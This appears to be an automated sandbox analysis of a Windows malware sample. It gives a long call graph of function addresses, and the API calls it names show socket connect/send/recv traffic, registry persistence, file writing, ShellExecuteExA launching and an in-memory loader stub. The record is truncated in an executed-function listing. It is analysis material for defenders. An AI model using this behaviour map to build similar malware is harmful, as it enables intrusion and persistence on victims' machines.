42648e 45102->45104 45106 402bef 26 API calls 45104->45106 45105 402bef 26 API calls 45107 424be8 45105->45107 45106->45095 45107->44992 45109 425eec __EH_prolog 45108->45109 45467 401bb2 45109->45467 45114 425f4b 45483 401a16 45114->45483 45115 425f2f 45504 401b6f 45115->45504 45118 425f58 45486 4024a1 45118->45486 45121 425f42 std::ios_base::_Ios_base_dtor 45121->44997 45125 425fa6 45126 401b6f 68 API calls 45125->45126 45126->45121 45128 4034ed __EH_prolog 45127->45128 45655 401056 45128->45655 45130 403513 45131 401056 50 API calls 45130->45131 45132 403542 45131->45132 45659 40399f 45132->45659 45134 403553 45134->45001 45136 42650e __EH_prolog 45135->45136 45137 401b1e 27 API calls 45136->45137 45138 4268d7 45137->45138 45697 401aa1 45138->45697 45140 4268ed 45141 401aa1 27 API calls 45140->45141 45142 426974 45141->45142 45143 401aa1 27 API calls 45142->45143 45144 426981 45143->45144 45145 401aa1 27 API calls 45144->45145 45146 4269e4 45145->45146 45147 401aa1 27 API calls 45146->45147 45148 4269f5 45147->45148 45149 401aa1 27 API calls 45148->45149 45150 426a02 45149->45150 45151 401aa1 27 API calls 45150->45151 45152 426aad 45151->45152 45153 401aa1 27 API calls 45152->45153 45154 426da4 45153->45154 45155 401aa1 27 API calls 45154->45155 45156 427053 45155->45156 45157 401aa1 27 API calls 45156->45157 45183 427060 45157->45183 45158 42717c 45159 401aa1 27 API calls 45158->45159 45160 427189 WSAStartup 45159->45160 45161 4271a3 socket 45160->45161 45184 4273da 45160->45184 45162 4271d0 45161->45162 45163 4271bb 45161->45163 45165 4271d8 gethostbyname 45162->45165 45164 4271c4 WSACleanup 45163->45164 45166 42758b 45164->45166 45167 4271e9 _Yarn 45165->45167 45165->45184 45166->45003 45169 4271fc htons connect 45167->45169 45168 42757e WSACleanup closesocket 45168->45166 45170 42722b 45169->45170 45169->45184 45171 42723d send 45170->45171 45172 42724d 45171->45172 45171->45184 45173 427253 send 45172->45173 45179 427269 ___scrt_fastfail 45172->45179 45173->45179 45173->45184 45174 42728f recv 45174->45179 45174->45184 45175 412faf 46 API calls 45175->45179 45176 4273cd 45177 4273d4 45176->45177 45178 427515 45176->45178 45195 4273e9 45176->45195 45177->45184 45177->45195 45180 427535 recv 45178->45180 45178->45184 45179->45174 45179->45175 45179->45176 45179->45184 45702 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45179->45702 45180->45178 45180->45184 45181 42740d recv 45181->45184 45181->45195 45183->45158 45185 401aa1 27 API calls 45183->45185 45184->45168 45187 42714c 45185->45187 45186 427508 45186->45184 45701 403ae1 27 API calls 45187->45701 45190 427157 SetThreadLocale 45191 42716f 45190->45191 45192 401aa1 27 API calls 45191->45192 45192->45158 45194 4274aa recv 45194->45184 45194->45195 45195->45181 45195->45184 45195->45186 45195->45194 45196 4274d5 recv 45195->45196 45703 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45195->45703 45704 42611d 22 API calls 45195->45704 45196->45184 45196->45195 45710 4275a4 45197->45710 45199 426139 RegCreateKeyExA 45200 4261f7 45199->45200 45203 42616c 45199->45203 45201 426206 45200->45201 45202 4261fd RegCloseKey 45200->45202 45201->45005 45202->45201 45204 402c71 27 API calls 45203->45204 45205 426195 45204->45205 45206 402c71 27 API calls 45205->45206 45207 4261be RegSetValueExA 45206->45207 45208 402bef 26 API calls 45207->45208 45209 4261ef 45208->45209 45210 402bef 26 API calls 45209->45210 45210->45200 45212 403579 __EH_prolog 45211->45212 45213 401056 50 API calls 45212->45213 45214 40359c 45213->45214 45215 401056 50 API calls 45214->45215 45216 4035c8 45215->45216 45217 40399f 27 API calls 45216->45217 45218 4035d9 45217->45218 45218->45009 45220 410cb2 45219->45220 45221 410c9d 45219->45221 45713 41097b 51 API calls 4 library calls 45220->45713 45711 412381 20 API calls __Strcoll 45221->45711 45224 410cad 45224->45020 45225 410ca2 45712 410905 26 API calls _Deallocate 45225->45712 45228 42588e 45227->45228 45229 42623e WriteFile FindCloseChangeNotification 45227->45229 45228->45024 45228->45028 45229->45228 45231 426271 45230->45231 45231->45231 45232 426279 ShellExecuteExA 45231->45232 45233 4262c5 45232->45233 45234 4262ae WaitForSingleObject CloseHandle 45232->45234 45235 402bef 26 API calls 45233->45235 45234->45233 45236 4262cd 45235->45236 45236->45028 45238 426331 45237->45238 45238->45032 45238->45238 45242 402c5a 45241->45242 45245 402c71 45242->45245 45244 401b3a 45244->44983 45246 402ca4 45245->45246 45248 402c80 BuildCatchObjectHelperInternal 45245->45248 45249 40373e 27 API calls 2 library calls 45246->45249 45248->45244 45249->45248 45250->45082 45252 402d2a 45251->45252 45254 402d31 _Yarn 45252->45254 45255 403859 45252->45255 45254->45087 45256 403866 45255->45256 45257 40386f 45255->45257 45262 4039ce 45256->45262 45259 40387b 45257->45259 45271 409256 45257->45271 45259->45254 45260 40386c 45260->45254 45263 409256 std::_Facet_Register 8 API calls 45262->45263 45264 4039e5 45263->45264 45265 4039f7 45264->45265 45266 4039ec 45264->45266 45278 41088a 26 API calls 3 library calls 45265->45278 45266->45260 45268 410924 45279 410932 11 API calls _abort 45268->45279 45270 410931 45273 40925b ___crtLCMapStringA 45271->45273 45272 409275 45272->45260 45273->45272 45275 409277 std::_Facet_Register 45273->45275 45280 412ede 7 API calls 2 library calls 45273->45280 45281 40aa2b RaiseException 45275->45281 45277 40996c 45278->45268 45279->45270 45280->45273 45281->45277 45283 403e16 __EH_prolog 45282->45283 45314 407d73 45283->45314 45285 403e38 45324 404189 45285->45324 45291 403e7f 45362 4044e5 45291->45362 45293 403e8b 45383 4043fe 45293->45383 45297 4040a1 __EH_prolog 45296->45297 45304 4040b2 45297->45304 45460 40429b 27 API calls __EH_prolog 45297->45460 45299 4040d9 45461 404777 27 API calls 45299->45461 45301 404152 45465 404238 26 API calls _Deallocate 45301->45465 45304->45095 45304->45098 45304->45100 45305 404144 45464 404777 27 API calls 45305->45464 45306 4040e9 45306->45301 45306->45305 45462 404777 27 API calls 45306->45462 45463 404579 26 API calls 45306->45463 45310 402c03 45309->45310 45311 402bfa 45309->45311 45310->45105 45466 40387f 26 API calls 2 library calls 45311->45466 45313->45099 45315 407d7f __EH_prolog3 45314->45315 45387 407b1c 45315->45387 45320 407d9d 45401 407f02 40 API calls _Atexit 45320->45401 45321 407dfb std::locale::_Init 45321->45285 45323 407da5 _Yarn 45393 407b74 45323->45393 45325 404193 __EH_prolog 45324->45325 45326 407b1c std::_Lockit::_Lockit 2 API calls 45325->45326 45327 4041a2 45326->45327 45406 401318 45327->45406 45329 4041b9 std::locale::_Getfacet 45337 4041cc 45329->45337 45412 40436e 45329->45412 45330 407b74 std::_Lockit::~_Lockit 2 API calls 45331 403e49 45330->45331 45340 4033ea 45331->45340 45334 4041e3 45426 407d41 8 API calls std::_Facet_Register 45334->45426 45335 404219 45427 40aa2b RaiseException 45335->45427 45337->45330 45339 40422f 45341 4033f4 __EH_prolog 45340->45341 45342 407b1c std::_Lockit::_Lockit 2 API calls 45341->45342 45343 403403 45342->45343 45344 401318 int 4 API calls 45343->45344 45346 40341a std::locale::_Getfacet 45344->45346 45345 40342d 45347 407b74 std::_Lockit::~_Lockit 2 API calls 45345->45347 45346->45345 45439 401429 76 API calls 2 library calls 45346->45439 45349 40346a 45347->45349 45356 404424 45349->45356 45350 40343d 45351 403444 45350->45351 45352 40347a 45350->45352 45440 407d41 8 API calls std::_Facet_Register 45351->45440 45441 40aa2b RaiseException 45352->45441 45355 403490 45357 40442e __EH_prolog 45356->45357 45442 404d6b 45357->45442 45359 404463 45360 409256 std::_Facet_Register 8 API calls 45359->45360 45361 40447e 45360->45361 45361->45291 45363 4044ef __EH_prolog 45362->45363 45454 405177 8 API calls std::_Facet_Register 45363->45454 45365 40450d 45455 405025 29 API calls std::_Facet_Register 45365->45455 45367 404517 45368 404571 45367->45368 45369 40451e 45367->45369 45458 404efe 27 API calls 45368->45458 45456 405119 8 API calls std::_Facet_Register 45369->45456 45372 404528 45457 405e85 8 API calls std::_Facet_Register 45372->45457 45375 404531 45375->45293 45384 404406 45383->45384 45386 403eb8 45383->45386 45459 40387f 26 API calls 2 library calls 45384->45459 45386->45091 45388 407b32 45387->45388 45389 407b2b 45387->45389 45391 407b30 45388->45391 45403 408745 EnterCriticalSection 45388->45403 45402 411a65 EnterCriticalSection _abort 45389->45402 45391->45323 45400 407edf 8 API calls 2 library calls 45391->45400 45394 407b7e 45393->45394 45395 411a6e 45393->45395 45399 407b91 45394->45399 45404 408753 LeaveCriticalSection 45394->45404 45405 411a4e LeaveCriticalSection 45395->45405 45397 411a75 45397->45321 45399->45321 45400->45320 45401->45323 45402->45391 45403->45391 45404->45399 45405->45397 45407 401324 45406->45407 45408 401348 45406->45408 45409 407b1c std::_Lockit::_Lockit 2 API calls 45407->45409 45408->45329 45410 40132e 45409->45410 45411 407b74 std::_Lockit::~_Lockit 2 API calls 45410->45411 45411->45408 45414 404378 __EH_prolog 45412->45414 45413 4041dc 45413->45334 45413->45335 45414->45413 45415 409256 std::_Facet_Register 8 API calls 45414->45415 45416 404395 45415->45416 45428 403a42 45416->45428 45420 4043c6 45437 40866c 38 API calls __Getcoll 45420->45437 45422 4043d4 45438 401239 74 API calls 2 library calls 45422->45438 45424 4043e4 45425 402bef 26 API calls 45424->45425 45425->45413 45426->45337 45427->45339 45429 403a4c __EH_prolog 45428->45429 45430 403a5d 45429->45430 45431 402c71 27 API calls 45429->45431 45432 403ac1 45430->45432 45433 402bef 26 API calls 45430->45433 45431->45430 45434 403ace 45432->45434 45435 402bef 26 API calls 45432->45435 45433->45432 45436 4011b0 76 API calls 7 library calls 45434->45436 45435->45434 45436->45420 45437->45422 45438->45424 45439->45350 45440->45345 45441->45355 45445 404eb6 45442->45445 45444 404d85 45444->45359 45444->45444 45446 404ed2 45445->45446 45452 404ece 45445->45452 45447 404ef8 45446->45447 45448 404eda 45446->45448 45453 4030f6 27 API calls 45447->45453 45450 403859 27 API calls 45448->45450 45450->45452 45452->45444 45454->45365 45455->45367 45456->45372 45457->45375 45459->45386 45460->45299 45461->45306 45462->45306 45463->45306 45464->45301 45466->45310 45468 401bbc __EH_prolog 45467->45468 45508 40307c 45468->45508 45474 401c1f 45475 401c51 45474->45475 45526 40187f 42 API calls 2 library calls 45474->45526 45477 402403 45475->45477 45478 40240d __EH_prolog 45477->45478 45544 402b06 45478->45544 45481 402441 45481->45114 45481->45115 45590 402baa 45483->45590 45485 401a30 ___scrt_fastfail 45485->45118 45487 4024ab __EH_prolog 45486->45487 45488 4024e4 45487->45488 45599 40187f 42 API calls 2 library calls 45487->45599 45489 402b06 42 API calls 45488->45489 45491 4024ee 45489->45491 45492 402551 45491->45492 45495 401d87 65 API calls 45491->45495 45496 40257c 45492->45496 45493 402511 45493->45492 45600 40187f 42 API calls 2 library calls 45493->45600 45495->45493 45497 402586 __EH_prolog 45496->45497 45498 402b06 42 API calls 45497->45498 45502 4025a8 45498->45502 45499 4025d8 45500 40265a 45499->45500 45605 40187f 42 API calls 2 library calls 45499->45605 45507 402b87 26 API calls _Deallocate 45500->45507 45502->45499 45601 401f2b 45502->45601 45643 4023b6 45504->45643 45506 401b95 45506->45121 45507->45125 45509 403086 __EH_prolog 45508->45509 45527 403175 45509->45527 45512 402fe5 45513 402fef __EH_prolog 45512->45513 45514 409256 std::_Facet_Register 8 API calls 45513->45514 45515 403005 45514->45515 45516 407d73 std::locale::_Init 43 API calls 45515->45516 45517 403013 45516->45517 45538 402e7b 45517->45538 45520 402f6b 45521 402f75 __EH_prolog 45520->45521 45522 402e7b 26 API calls 45521->45522 45525 402fbf std::ios_base::_Ios_base_dtor 45521->45525 45523 402f9d 45522->45523 45543 4035f5 76 API calls 7 library calls 45523->45543 45525->45474 45526->45475 45528 40317f __EH_prolog 45527->45528 45529 409256 std::_Facet_Register 8 API calls 45528->45529 45530 4031b9 45529->45530 45531 407d73 std::locale::_Init 43 API calls 45530->45531 45532 4031c6 45531->45532 45533 4033ea 76 API calls 45532->45533 45534 4031f5 std::ios_base::_Ios_base_dtor 45533->45534 45535 401bec 45534->45535 45537 40187f 42 API calls 2 library calls 45534->45537 45535->45512 45537->45535 45539 401c0f 45538->45539 45540 402ed9 45538->45540 45539->45520 45542 40e7d7 26 API calls 2 library calls 45540->45542 45542->45539 45543->45525 45545 402b10 __EH_prolog 45544->45545 45556 403101 45545->45556 45548 401d87 45549 401d99 45548->45549 45555 401df4 45549->45555 45564 402dfd 45549->45564 45552 401de1 45552->45555 45573 40fd67 45552->45573 45555->45481 45558 40310b __EH_prolog 45556->45558 45557 403128 45559 40241d 45557->45559 45563 40187f 42 API calls 2 library calls 45557->45563 45558->45557 45562 403242 42 API calls __EH_prolog 45558->45562 45559->45481 45559->45548 45562->45557 45563->45559 45565 402e0d 45564->45565 45567 401dc4 45564->45567 45565->45567 45584 4022ae 65 API calls 45565->45584 45567->45552 45567->45555 45570 4106d4 45567->45570 45568 402e1a 45568->45567 45585 40ea7d 65 API calls 2 library calls 45568->45585 45571 41049b _Xfiopen 64 API calls 45570->45571 45572 4106ea 45571->45572 45572->45552 45574 40fd72 45573->45574 45575 40fd87 45573->45575 45586 412381 20 API calls __Strcoll 45574->45586 45583 40fd9f 45575->45583 45588 412381 20 API calls __Strcoll 45575->45588 45577 40fd77 45587 410905 26 API calls _Deallocate 45577->45587 45580 40fd94 45589 410905 26 API calls _Deallocate 45580->45589 45581 40fd82 45581->45555 45583->45555 45584->45568 45585->45567 45586->45577 45587->45581 45588->45580 45589->45583 45591 402bc6 45590->45591 45596 402bc2 45590->45596 45592 402be9 45591->45592 45593 402bce 45591->45593 45598 4030f6 27 API calls 45592->45598 45594 403859 27 API calls 45593->45594 45594->45596 45596->45485 45599->45488 45600->45492 45602 401f3f 45601->45602 45603 401f52 _Yarn 45601->45603 45602->45499 45603->45602 45606 4102e9 45603->45606 45605->45500 45609 410306 45606->45609 45608 410301 45608->45602 45610 410312 __FrameHandler3::FrameUnwindToState 45609->45610 45611 410352 45610->45611 45612 41034a __fread_nolock 45610->45612 45617 410325 ___scrt_fastfail 45610->45617 45622 40e81d EnterCriticalSection 45611->45622 45612->45608 45614 41035c 45623 41011d 45614->45623 45636 412381 20 API calls __Strcoll 45617->45636 45618 41033f 45637 410905 26 API calls _Deallocate 45618->45637 45622->45614 45625 41012f ___scrt_fastfail 45623->45625 45629 41014c 45623->45629 45624 41013c 45639 412381 20 API calls __Strcoll 45624->45639 45625->45624 45625->45629 45632 41018f __fread_nolock 45625->45632 45627 410141 45640 410905 26 API calls _Deallocate 45627->45640 45638 410391 LeaveCriticalSection _Xfiopen 45629->45638 45630 4102ab ___scrt_fastfail 45642 412381 20 API calls __Strcoll 45630->45642 45632->45629 45632->45630 45634 4154e8 _Xfiopen 26 API calls 45632->45634 45635 4192ad __fread_nolock 38 API calls 45632->45635 45641 410399 26 API calls 4 library calls 45632->45641 45634->45632 45635->45632 45636->45618 45637->45612 45638->45612 45639->45627 45640->45629 45641->45632 45642->45627 45644 4023dd 45643->45644 45645 4023ef 45644->45645 45647 402f2f 45644->45647 45645->45506 45648 402f3d 45647->45648 45654 402f39 45647->45654 45649 402dfd 65 API calls 45648->45649 45651 402f42 45649->45651 45650 402e7b 26 API calls 45653 402f66 45650->45653 45652 40e228 _Xfiopen 67 API calls 45651->45652 45652->45654 45653->45645 45654->45650 45656 40106d ___scrt_initialize_default_local_stdio_options 45655->45656 45663 40fd43 45656->45663 45660 4039c7 45659->45660 45661 4039bb 45659->45661 45660->45134 45662 402c71 27 API calls 45661->45662 45662->45660 45666 40ead5 45663->45666 45667 40eb15 45666->45667 45668 40eafd 45666->45668 45667->45668 45670 40eb1d 45667->45670 45690 412381 20 API calls __Strcoll 45668->45690 45692 40e3f2 38 API calls 3 library calls 45670->45692 45672 40eb02 45691 410905 26 API calls _Deallocate 45672->45691 45673 40eb2d 45693 40eef9 20 API calls __Strcoll 45673->45693 45675 40eb0d 45683 4097a5 45675->45683 45678 40eba5 45694 40f0ad 50 API calls 3 library calls 45678->45694 45679 40107b 45679->45130 45682 40ebb0 45695 40ef2e 20 API calls _free 45682->45695 45684 4097b0 IsProcessorFeaturePresent 45683->45684 45685 4097ae 45683->45685 45687 409efa 45684->45687 45685->45679 45696 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45687->45696 45689 409fdd 45689->45679 45690->45672 45691->45675 45692->45673 45693->45678 45694->45682 45695->45675 45696->45689 45698 401aab 45697->45698 45698->45698 45705 402cba 45698->45705 45700 401abd 45700->45140 45701->45190 45702->45179 45703->45195 45704->45195 45706 402cfa 45705->45706 45708 402cd0 BuildCatchObjectHelperInternal 45705->45708 45709 4037a9 27 API calls 2 library calls 45706->45709 45708->45700 45709->45708 45710->45199 45711->45225 45712->45224 45713->45224 45715 4138da _abort 45714->45715 45716 4138e1 45715->45716 45717 4138f3 45715->45717 45753 413a28 GetModuleHandleW 45716->45753 45738 411a06 EnterCriticalSection 45717->45738 45720 4138e6 45720->45717 45754 413a6c GetModuleHandleExW 45720->45754 45723 41396f 45729 413987 45723->45729 45733 41381a _abort 5 API calls 45723->45733 45724 4138fa 45724->45723 45737 413998 45724->45737 45739 4151ba 45724->45739 45727 4139e1 45762 424699 5 API calls ___crtLCMapStringA 45727->45762 45728 4139b5 45745 4139e7 45728->45745 45734 41381a _abort 5 API calls 45729->45734 45733->45729 45734->45737 45742 4139d8 45737->45742 45738->45724 45763 414ef3 45739->45763 45782 411a4e LeaveCriticalSection 45742->45782 45744 4139b1 45744->45727 45744->45728 45783 4177fa 45745->45783 45748 413a15 45750 413a6c _abort 8 API calls 45748->45750 45749 4139f5 GetPEB 45749->45748 45751 413a05 GetCurrentProcess TerminateProcess 45749->45751 45752 413a1d ExitProcess 45750->45752 45751->45748 45753->45720 45755 413a96 GetProcAddress 45754->45755 45756 413ab9 45754->45756 45757 413aab 45755->45757 45758 413ac8 45756->45758 45759 413abf FreeLibrary 45756->45759 45757->45756 45760 4097a5 ___crtLCMapStringA 5 API calls 45758->45760 45759->45758 45761 4138f2 45760->45761 45761->45717 45766 414ea2 45763->45766 45765 414f17 45765->45723 45767 414eae __FrameHandler3::FrameUnwindToState 45766->45767 45774 411a06 EnterCriticalSection 45767->45774 45769 414ebc 45775 414f43 45769->45775 45773 414eda __fread_nolock 45773->45765 45774->45769 45776 414f63 45775->45776 45780 414f6b 45775->45780 45777 4097a5 ___crtLCMapStringA 5 API calls 45776->45777 45778 414ec9 45777->45778 45781 414ee7 LeaveCriticalSection std::_Lockit::~_Lockit 45778->45781 45779 41629a _free 20 API calls 45779->45776 45780->45776 45780->45779 45781->45773 45782->45744 45784 417815 45783->45784 45785 41781f 45783->45785 45787 4097a5 ___crtLCMapStringA 5 API calls 45784->45787 45790 4171b7 5 API calls 2 library calls 45785->45790 45788 4139f1 45787->45788 45788->45748 45788->45749 45789 417836 45789->45784 45790->45789 45791 41aff9 45796 41adc7 45791->45796 45794 41b021 45801 41adf2 45796->45801 45798 41afe5 45815 410905 26 API calls _Deallocate 45798->45815 45800 41af44 45800->45794 45808 41a34b 45800->45808 45807 41af3b 45801->45807 45811 422ce9 46 API calls 2 library calls 45801->45811 45803 41af85 45803->45807 45812 422ce9 46 API calls 2 library calls 45803->45812 45805 41afa4 45805->45807 45813 422ce9 46 API calls 2 library calls 45805->45813 45807->45800 45814 412381 20 API calls __Strcoll 45807->45814 45816 419d20 45808->45816 45810 41a366 45810->45794 45811->45803 45812->45805 45813->45807 45814->45798 45815->45800 45819 419d2c __FrameHandler3::FrameUnwindToState 45816->45819 45817 419d3a 45834 412381 20 API calls __Strcoll 45817->45834 45819->45817 45821 419d73 45819->45821 45820 419d3f 45835 410905 26 API calls _Deallocate 45820->45835 45827 41a2fa 45821->45827 45826 419d49 __fread_nolock 45826->45810 45837 4228d8 45827->45837 45832 41629a _free 20 API calls 45833 419d97 45832->45833 45836 419dc0 LeaveCriticalSection __wsopen_s 45833->45836 45834->45820 45835->45826 45836->45826 45838 4228e4 45837->45838 45839 4228fb 45837->45839 45908 412381 20 API calls __Strcoll 45838->45908 45840 422903 45839->45840 45841 42291a 45839->45841 45910 412381 20 API calls __Strcoll 45840->45910 45912 4172ce 10 API calls 2 library calls 45841->45912 45843 4228e9 45909 410905 26 API calls _Deallocate 45843->45909 45847 422908 45911 410905 26 API calls _Deallocate 45847->45911 45848 422921 MultiByteToWideChar 45850 422950 45848->45850 45851 422940 GetLastError 45848->45851 45852 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 45850->45852 45913 41234b 20 API calls 3 library calls 45851->45913 45855 422958 45852->45855 45853 41a310 45853->45833 45861 41a36b 45853->45861 45856 422980 45855->45856 45857 42295f MultiByteToWideChar 45855->45857 45859 41629a _free 20 API calls 45856->45859 45857->45856 45858 422974 GetLastError 45857->45858 45914 41234b 20 API calls 3 library calls 45858->45914 45859->45853 45915 41a0ce 45861->45915 45864 41a3b6 45933 41e7d7 45864->45933 45865 41a39d 45947 41236e 20 API calls __Strcoll 45865->45947 45868 41a3bb 45870 41a3c4 45868->45870 45871 41a3db 45868->45871 45869 41a3a2 45948 412381 20 API calls __Strcoll 45869->45948 45949 41236e 20 API calls __Strcoll 45870->45949 45946 41a039 CreateFileW 45871->45946 45875 41a3c9 45950 412381 20 API calls __Strcoll 45875->45950 45876 41a338 45876->45832 45878 41a491 GetFileType 45879 41a4e3 45878->45879 45880 41a49c GetLastError 45878->45880 45955 41e720 21 API calls 3 library calls 45879->45955 45953 41234b 20 API calls 3 library calls 45880->45953 45881 41a466 GetLastError 45952 41234b 20 API calls 3 library calls 45881->45952 45884 41a414 45884->45878 45884->45881 45951 41a039 CreateFileW 45884->45951 45885 41a4aa CloseHandle 45885->45869 45887 41a4d3 45885->45887 45954 412381 20 API calls __Strcoll 45887->45954 45889 41a459 45889->45878 45889->45881 45891 41a504 45892 41a550 45891->45892 45956 41a24a 72 API calls 4 library calls 45891->45956 45897 41a57d 45892->45897 45957 419dec 72 API calls 5 library calls 45892->45957 45893 41a4d8 45893->45869 45896 41a576 45896->45897 45898 41a58e 45896->45898 45899 4163fd __wsopen_s 29 API calls 45897->45899 45898->45876 45900 41a60c CloseHandle 45898->45900 45899->45876 45958 41a039 CreateFileW 45900->45958 45902 41a637 45903 41a641 GetLastError 45902->45903 45907 41a66d 45902->45907 45959 41234b 20 API calls 3 library calls 45903->45959 45905 41a64d 45960 41e8e9 21 API calls 3 library calls 45905->45960 45907->45876 45908->45843 45909->45853 45910->45847 45911->45853 45912->45848 45913->45853 45914->45856 45916 41a109 45915->45916 45917 41a0ef 45915->45917 45961 41a05e 45916->45961 45917->45916 45968 412381 20 API calls __Strcoll 45917->45968 45920 41a141 45930 41a170 45920->45930 45970 412381 20 API calls __Strcoll 45920->45970 45921 41a0fe 45969 410905 26 API calls _Deallocate 45921->45969 45925 41a1be 45927 41a23d 45925->45927 45931 41a1c3 45925->45931 45926 41a165 45971 410905 26 API calls _Deallocate 45926->45971 45973 410932 11 API calls _abort 45927->45973 45930->45931 45972 413b67 26 API calls 2 library calls 45930->45972 45931->45864 45931->45865 45932 41a249 45934 41e7e3 __FrameHandler3::FrameUnwindToState 45933->45934 45976 411a06 EnterCriticalSection 45934->45976 45936 41e80f 45980 41e5b6 21 API calls 2 library calls 45936->45980 45939 41e85a __fread_nolock 45939->45868 45940 41e7ea 45940->45936 45942 41e87d EnterCriticalSection 45940->45942 45943 41e831 45940->45943 45941 41e814 45941->45943 45981 41e6fd EnterCriticalSection 45941->45981 45942->45943 45944 41e88a LeaveCriticalSection 45942->45944 45977 41e8e0 45943->45977 45944->45940 45946->45884 45947->45869 45948->45876 45949->45875 45950->45869 45951->45889 45952->45869 45953->45885 45954->45893 45955->45891 45956->45892 45957->45896 45958->45902 45959->45905 45960->45907 45963 41a076 45961->45963 45962 41a091 45962->45920 45963->45962 45974 412381 20 API calls __Strcoll 45963->45974 45965 41a0b5 45975 410905 26 API calls _Deallocate 45965->45975 45967 41a0c0 45967->45920 45968->45921 45969->45916 45970->45926 45971->45930 45972->45925 45973->45932 45974->45965 45975->45967 45976->45940 45982 411a4e LeaveCriticalSection 45977->45982 45979 41e8e7 45979->45939 45980->45941 45981->45943 45982->45979 45983 40e78b 45993 40e078 45983->45993 45987 40e798 45988 4165f6 _Xfiopen 20 API calls 45987->45988 45989 40e7a7 DeleteCriticalSection 45988->45989 45989->45987 45990 40e7c2 45989->45990 45991 41629a _free 20 API calls 45990->45991 45992 40e7cd 45991->45992 46006 40e081 45993->46006 45995 40e07f 45996 4178b7 45995->45996 45997 4178c3 __FrameHandler3::FrameUnwindToState 45996->45997 46023 411a06 EnterCriticalSection 45997->46023 45999 417939 46024 41794e 45999->46024 46001 4178ce 46001->45999 46003 41790d DeleteCriticalSection 46001->46003 46005 40e228 _Xfiopen 67 API calls 46001->46005 46002 417945 __fread_nolock 46002->45987 46004 41629a _free 20 API calls 46003->46004 46004->46001 46005->46001 46007 40e08d __FrameHandler3::FrameUnwindToState 46006->46007 46016 411a06 EnterCriticalSection 46007->46016 46009 40e130 46017 40e150 46009->46017 46012 40e13c __fread_nolock 46012->45995 46014 40e09c 46014->46009 46015 40e031 66 API calls 46014->46015 46020 40e81d EnterCriticalSection 46014->46020 46021 40e126 LeaveCriticalSection _Xfiopen 46014->46021 46015->46014 46016->46014 46022 411a4e LeaveCriticalSection 46017->46022 46019 40e157 46019->46012 46020->46014 46021->46014 46022->46019 46023->46001 46027 411a4e LeaveCriticalSection 46024->46027 46026 417955 46026->46002 46027->46026 46028 420003c 46029 4200049 46028->46029 46043 4200e0f SetErrorMode SetErrorMode 46029->46043 46034 4200265 46035 42002ce VirtualProtect 46034->46035 46037 420030b 46035->46037 46036 4200439 VirtualFree 46041 42005f4 LoadLibraryA 46036->46041 46042 42004be 46036->46042 46037->46036 46038 42004e3 LoadLibraryA 46038->46042 46040 42008c7 46041->46040 46042->46038 46042->46041 46044 4200223 46043->46044 46045 4200d90 46044->46045 46046 4200dad 46045->46046 46047 4200dbb GetPEB 46046->46047 46048 4200238 VirtualAlloc 46046->46048 46047->46048 46048->46034 46049 41870f 46050 41871b __FrameHandler3::FrameUnwindToState 46049->46050 46051 418727 46050->46051 46052 41873e 46050->46052 46083 412381 20 API calls __Strcoll 46051->46083 46062 40e81d EnterCriticalSection 46052->46062 46055 41874e 46063 41878b 46055->46063 46056 41872c 46084 410905 26 API calls _Deallocate 46056->46084 46059 41875a 46085 418781 LeaveCriticalSection _Xfiopen 46059->46085 46060 418737 __fread_nolock 46062->46055 46064 4187b3 46063->46064 46065 418799 46063->46065 46067 4154e8 _Xfiopen 26 API calls 46064->46067 46089 412381 20 API calls __Strcoll 46065->46089 46069 4187bc 46067->46069 46068 41879e 46090 410905 26 API calls _Deallocate 46068->46090 46086 4197e5 46069->46086 46073 4188c0 46075 4188cd 46073->46075 46082 418873 46073->46082 46074 418844 46077 418861 46074->46077 46074->46082 46092 412381 20 API calls __Strcoll 46075->46092 46091 418aa4 31 API calls 3 library calls 46077->46091 46079 41886b 46080 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46079->46080 46080->46059 46082->46080 46093 418920 30 API calls 2 library calls 46082->46093 46083->46056 46084->46060 46085->46060 46094 419662 46086->46094 46088 4187d8 46088->46073 46088->46074 46088->46080 46089->46068 46090->46080 46091->46079 46092->46080 46093->46080 46095 41966e __FrameHandler3::FrameUnwindToState 46094->46095 46096 419676 46095->46096 46097 41968e 46095->46097 46120 41236e 20 API calls __Strcoll 46096->46120 46098 419742 46097->46098 46104 4196c6 46097->46104 46125 41236e 20 API calls __Strcoll 46098->46125 46100 41967b 46121 412381 20 API calls __Strcoll 46100->46121 46103 419747 46126 412381 20 API calls __Strcoll 46103->46126 46119 41e6fd EnterCriticalSection 46104->46119 46105 419683 __fread_nolock 46105->46088 46108 41974f 46127 410905 26 API calls _Deallocate 46108->46127 46109 4196cc 46111 4196f0 46109->46111 46112 419705 46109->46112 46122 412381 20 API calls __Strcoll 46111->46122 46114 419767 __fread_nolock 28 API calls 46112->46114 46115 419700 46114->46115 46124 41973a LeaveCriticalSection __wsopen_s 46115->46124 46116 4196f5 46123 41236e 20 API calls __Strcoll 46116->46123 46119->46109 46120->46100 46121->46105 46122->46116 46123->46115 46124->46105 46125->46103 46126->46108 46127->46105

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 00424B3E Relevance: 53.7, APIs: 1, Strings: 29, Instructions: 1213COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 0 424b3e-424eb5 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 426354 call 401b1e GetModuleFileNameA call 401b1e call 425ee2 call 401a0c call 403491 * 3 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c 129 424f07-425842 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42612f call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 